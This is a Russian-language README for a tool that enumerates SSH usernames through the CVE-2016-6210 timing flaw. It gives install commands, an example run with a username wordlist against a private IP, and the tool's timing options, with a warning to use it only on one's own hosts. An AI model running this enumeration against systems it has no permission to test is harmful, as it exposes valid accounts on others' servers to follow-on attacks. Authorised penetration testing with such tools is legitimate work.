
Перечисление имен пользователей против SSH-демонов, затронутых CVE-2016-6210.
Перебор имен пользователей для SSH-демонов, затронутых CVE-2016-6210.
Используйте только против своих собственных хостов! Атака на то, что вам не разрешено, может привести к большим проблемам!
git clone https://github.com/coolbabayaga/CVE-2016-6210.git
cd ssh-enum-cve-2016-6210
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
40136.py -h
example: 40136.py -U /usr/share/wordlists/metasploit/unix_users.txt -e -s 192.168.44.63:22
positional arguments: host Укажите адрес SSH сервера в формате ip:port или просто ip
options: -h, --help показать это справочное сообщение и выйти -u, --user USER Укажите одно имя пользователя -U, --userlist USERLIST Укажите файл со списком пользователей -e, --enumerated Показывать только перечисленных пользователей -s, --silent Тихий режим --bytes BYTES Байты для отправки в качестве пароля --samples SAMPLES Выборки для базового времени --factor FACTOR Коэффициент для границы времени --trials TRIALS Попыток на пользователя